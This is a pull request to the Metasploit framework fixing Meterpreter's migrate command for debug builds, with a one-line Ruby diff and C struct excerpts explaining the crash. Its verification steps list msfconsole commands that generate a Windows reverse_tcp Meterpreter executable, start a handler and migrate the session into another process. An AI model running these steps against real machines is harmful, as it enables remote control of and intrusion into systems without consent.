### PR TITLE
fix migrate to pass the debug_build flag

### DIFF
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -965,7 +965,7 @@ private
     # Create the migrate stager
     migrate_stager = c.new()
 
-    migrate_stager.stage_meterpreter
+    migrate_stager.stage_meterpreter({datastore: {'MeterpreterDebugBuild' => client.debug_build}})
   end
 
   #


### PR DESCRIPTION
This PR fix a bug present in the migrate command of metasploit-framework.

## Issue
When a Meterpreter with `MeterpreterDebugBuild = true` is delivered, the`migrate` to a target process is broken.
This happens because metasploit-framework will deliver a **Relase Binary** and the metsrv will inject it passing a **Debug Version** of the config.

```c
typedef struct _MetsrvConfig
{
	MetsrvSession session;
	MetsrvTransportCommon transports[1];  ///! Placeholder for 0 or more transports
        ...
} MetsrvConfig;
typedef struct _MetsrvSession
{
	union
	{
		UINT_PTR handle;
		BYTE padding[8];
	} comms_handle;                       ///! Socket/handle for communications (if there is one).
	DWORD exit_func;                      ///! Exit func identifier for when the session ends.
	int expiry;                           ///! The total number of seconds to wait before killing off the session.
	BYTE uuid[UUID_SIZE];                 ///! UUID
	BYTE session_guid[sizeof(GUID)];      ///! Current session GUID
#ifdef DEBUGTRACE
    CHARTYPE log_path[LOG_PATH_SIZE];      <-- This makes the Meterpreter crash
#endif
} MetsrvSession;
```

The workaround on that is to pass the `debug_build` status inside the `client` instance as an `opts` to the `MeterpreterLoader` class when is called during the migration.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use payloads/windows/x64/meterpreter/reverse_tcp`
- [ ] `set MeterpreterDebugBuild true`
- [ ]  `set lhost <your lhost>`
- [ ]  `generate -f exe -o ../shell.exe`
- [ ] `to_handler`
- [ ] Execute shell.exe
- [ ] Open a notepad
- [ ] `migrate <notepad pid>`

With the original code the session will close and the notepad most likely will crash.
Checkout the PR and try again. Now the migration should work.
